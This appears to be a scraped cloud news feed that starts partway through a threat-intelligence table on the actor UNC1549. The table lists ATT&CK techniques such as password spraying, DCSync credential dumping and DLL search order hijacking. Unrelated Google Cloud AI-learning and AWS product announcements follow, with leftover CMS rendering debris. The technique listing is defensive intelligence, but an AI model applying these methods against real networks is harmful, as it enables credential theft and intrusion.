Credential Access
T1110.003
Brute Force: Password Spraying
UNC1549 was observed performing password spray attacks against the Domain.
Credential Access
T1003.006
OS Credential Dumping: DCSync
UNC1549 was observed using DCSYNCER.SLICK to perform DCSync on domain controller level.
Defense Evasion
T1574.001
Hijack Execution Flow: DLL Search Order Hijacking
UNC1549 was observed using Search Order Hijacking to execute both LIGHTRAIL and DCSYNCER.SLICK.
Initial Access
T1078
Valid Accounts
UNC1549 used valid compromised accounts to gain initial access
Initial Access
T1199
Trusted Relationship
UNC1549 used trusted third party vendor accounts for both initial access and lateral movement.
Google SecOps customers receive robust detection for UNC1549 TTPs through curated threat intelligence from Mandiant and Google Threat Intelligence. This frontline intelligence is operationalized within the platform as custom detection signatures and advanced YARA-L rules.
We’re excited to launch the Production-Ready AI with Google Cloud Learning Path, a free series designed to take your AI projects from prototype to production.
This page is the central hub for the curriculum. We’ll be updating it weekly with new modules from now through mid-December.
Why We Built This: Bridging the Prototype-to-Production Gap
Generative AI makes it easy to build an impressive prototype. But moving from that proof-of-concept to a secure, scalable, and observable production system is where many projects stall. This is the prototype-to-production gap. It’s the challenge of answering hard questions about security, infrastructure, and monitoring for a system that now includes a probabilistic model.
It’s a journey we’ve been on with our own teams at Google Cloud. To solve for this ongoing challenge, we built a comprehensive internal playbook focused on production-grade best practices. After seeing the playbook’s success, we knew we had to share it.
We’re excited to share this curriculum with the developer community. Share your progress and connect with others on the journey using the hashtag #ProductionReadyAI. Happy learning!
The Curriculum
Module 1: Developing Apps that use LLMs
Start with the fundamentals of building applications and interacting with models using the Vertex AI SDK.
The landscape of generative AI is shifting. While proprietary APIs are powerful, there is a growing demand for open models—models where the architecture and weights are publicly available. This shift puts control back in the hands of developers, offering transparency, data privacy, and the ability to fine-tune for specific use cases.
To help you navigate this landscape, we are releasing two new hands-on labs featuring Gemma 3, Google’s latest family of lightweight, state-of-the-art open models.
Why Gemma?
Built from the same research and technology as Gemini, Gemma models are designed for responsible AI development. Gemma 3 is particularly exciting because it offers multimodal capabilities (text and image) and fits efficiently on smaller hardware footprints while delivering massive performance.
But running a model on your laptop is very different from running it in production. You need scale, reliability, and hardware acceleration (GPUs). The question is: Where should you deploy?
Best for: Developers who want an API up and running instantly without managing infrastructure, scaling to zero when not in use.
If your priority is simplicity and cost-efficiency for stateless workloads, Cloud Run is your answer. It abstracts away the server management entirely. With the recent addition of GPU support on Cloud Run, you can now serve modern LLMs without provisioning a cluster.
aside_block
<ListValue: [StructValue([(‘title’, ‘Start the lab!’), (‘body’, <wagtail.rich_text.RichText object at 0x7f1d25d64040>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Path 2: The Platform Approach (GKE)
Best for: Engineering teams building complex AI platforms, requiring high throughput, custom orchestration, or integration with a broader microservices ecosystem.
When your application graduates from a prototype to a high-traffic production system, you need the control of Kubernetes. GKE Autopilot gives you that power while still handling the heavy lifting of node management. This path creates a seamless journey from local testing to cloud production.
aside_block
<ListValue: [StructValue([(‘title’, ‘Start the lab!’), (‘body’, <wagtail.rich_text.RichText object at 0x7f1d25d64d30>), (‘btn_text’, ”), (‘href’, ”), (‘image’, None)])]>
Which Path Will You Choose?
Whether you are looking for the serverless simplicity of Cloud Run or the robust orchestration of GKE, Google Cloud provides the tools to take Gemma 3 from a concept to a deployed application.
AWS Transform for VMware now allows customers to automatically generate network configurations that can be directly imported into the Landing Zone Accelerator on AWS solution (LZA). Building on AWS Transform’s existing support for infrastructure-as-code generation in AWS CloudFormation, AWS CDK, and Terraform formats, this new capability specifically enables automatic transformation of VMware network environments into LZA-compatible network configuration YAML files. These YAML configurations can be directly deployed through LZA’s deployment pipeline, streamlining the process of setting up your cloud infrastructure.
AWS Transform for VMware is an agentic AI service that automates the discovery, planning, and migration of VMware workloads, accelerating infrastructure modernization with increased speed and confidence. Landing Zone Accelerator on AWS solution (LZA) automates the setup of a secure, multi-account AWS environment using AWS best practices. Migrating workloads to AWS traditionally requires you to manually recreate network configurations while maintaining operational and compliance consistency. The service now automates the generation of LZA network configurations, reducing manual effort, potential configuration errors, and deployment time while ensuring compliance with enterprise security standards.
AWS Marketplace now displays estimated tax information and the invoicing entity to buyers at the time of purchase. This new capability helps customers understand the total cost of their AWS Marketplace purchases before completing transactions, providing enhanced transparency for procurement approvals and budgeting.
When reviewing offers in AWS Marketplace, customers can now see estimated tax amounts, tax rates, and the invoicing entity based on their current tax and address settings in the AWS Billing console. This information appears at the time of procurement and can be downloaded as a PDF, allowing buyers to request approval for the correct spend amount and issue purchase orders to the appropriate invoicing entity. The estimated tax display includes the tax type (such as Value Added Tax, Goods and Services Tax, or US sales tax), estimated tax amount for upfront charges, and tax rate information. This visibility helps finance teams accurately budget and avoid unexpected costs that can impact procurement workflows and payment processing.
This capability is available today in all AWS Regions where AWS Marketplace is supported.
For information on managing your tax settings, refer to the AWS Billing Documentation. To learn more about tax handling in AWS Marketplace, visit this page.
Starting today, Amazon EC2 High Memory U7i instances with 24TB of memory (u7in-24tb.224xlarge) are now available in the US East (Ohio) region. U7in-24tb instances are part of AWS 7th generation and are powered by custom fourth generation Intel Xeon Scalable Processors (Sapphire Rapids). U7in-24tb instances offer 24TB of DDR5 memory, enabling customers to scale transaction processing throughput in a fast-growing data environment.
U7in-24tb instances offer 896 vCPUs, support up to 100Gbps Elastic Block Storage (EBS) for faster data loading and backups, deliver up to 200Gbps of network bandwidth, and support ENA Express. U7i instances are ideal for customers using mission-critical in-memory databases like SAP HANA, Oracle, and SQL Server..
Today, AWS launched the ability for Amazon VPC IP Address Manager (IPAM) to automatically acquire non-overlapping IP address allocations from Infoblox Universal IPAM. This feature minimizes manual processes between cloud and on-premises administrators, reducing the turnaround time.
With this launch, you can automatically acquire non-overlapping IP addresses from your on-premises Infoblox Universal IPAM into your top-level AWS IPAM pool and organize them into regional pools based on your business requirements. When you acquire non-overlapping IPs, you reduce the risk of service disruptions because your IPs don’t conflict with on-premise IP addresses. Previously, in hybrid cloud environments, administrators had to use offline means such as tickets or emails to request and allocate IP addresses, which was often error-prone and time-consuming. This integration automates the manual process, improving operational efficiency.
This feature is available in all AWS Regions where Amazon VPC IPAM is supported, excluding AWS China Regions and AWS GovCloud (US) Regions.
Starting today, Amazon Aurora MySQL – Compatible Edition 3 (with MySQL 8.0 compatibility) will support MySQL 8.0.43 through Aurora MySQL v3.11.
In addition to several security enhancements and bug fixes, MySQL 8.0.43 contains additional errors for group replication and introduces the mysql client “commands” option, which enables or disables most mysql client commands. For more details, refer to the Aurora MySQL 3.11 and MySQL 8.0.43 release notes. To upgrade to Aurora MySQL 3.11, you can initiate a minor version upgrade manually by modifying your DB cluster, or you can enable the “Auto minor version upgrade” option when creating or modifying a DB cluster. This release is available in all AWS regions where Aurora MySQL is available.
Amazon Aurora is designed for unparalleled high performance and availability at global scale with full MySQL and PostgreSQL compatibility. It provides built-in security, continuous backups, serverless compute, up to 15 read replicas, automated multi-Region replication, and integrations with other Amazon Web Services services. To get started with Amazon Aurora, take a look at our getting started page.
Amazon Relational Database Service (Amazon RDS) for MySQL now supports MySQL minor versions 8.0.44 and 8.4.7, the latest minors released by the MySQL community. We recommend upgrading to the newer minor versions to fix known security vulnerabilities in prior versions of MySQL and to benefit from bug fixes, performance improvements, and new functionality added by the MySQL community. Learn more about the enhancements in RDS for MySQL 8.0.44 and 8.4.7 in the Amazon RDS user guide.
You can leverage automatic minor version upgrades to automatically upgrade your databases to more recent minor versions during scheduled maintenance windows. You can also use Amazon RDS Managed Blue/Green deployments for safer, simpler, and faster updates to your MySQL instances. Learn more about upgrading your database instances, including automatic minor version upgrades and Blue/Green Deployments, in the Amazon RDS User Guide.
Amazon RDS for MySQL makes it simple to set up, operate, and scale MySQL deployments in the cloud. Learn more about pricing details and regional availability at Amazon RDS for MySQL. Create or update a fully managed Amazon RDS for MySQL database in the Amazon RDS Management Console.
AWS Lambda announces Provisioned Mode for SQS event-source-mappings (ESMs) that subscribe to Amazon SQS, a feature that allows you to optimize the throughput of your SQS ESM by provisioning event polling resources that remain ready to handle sudden spikes in traffic. SQS ESM configured with Provisioned Mode scales 3x faster (up to 1000 concurrent executions per minute) and supports 16x higher concurrency (up to 20,000 concurrent executions) than default SQS ESM capability. This allows you to build highly responsive and scalable event-driven applications with stringent performance requirements.
Customers use SQS as an event source for Lambda functions to build mission-critical applications using Lambda’s fully-managed SQS ESM, which automatically scales polling resources in response to events. However, for applications that need to handle unpredictable bursts of traffic, lack of control over the throughput of ESM can lead to delays in event processing. Provisioned Mode for SQS ESM allows you to fine tune the throughput of the ESM by provisioning a minimum and maximum number of polling resources called event pollers that are ready to handle sudden spikes in traffic. With this feature, you can process events with lower latency, handle sudden traffic spikes more effectively, and maintain precise control over your event processing resources.
This feature is generally available in all AWS Commercial Regions. You can activate Provisioned Mode for SQS ESM by configuring a minimum and maximum number of event pollers in the ESM API, AWS Console, AWS CLI, AWS SDK, AWS CloudFormation, and AWS SAM. You pay for the usage of event pollers, along a billing unit called Event Poller Unit (EPU). To learn more, read Lambda ESM documentation and AWS Lambda pricing.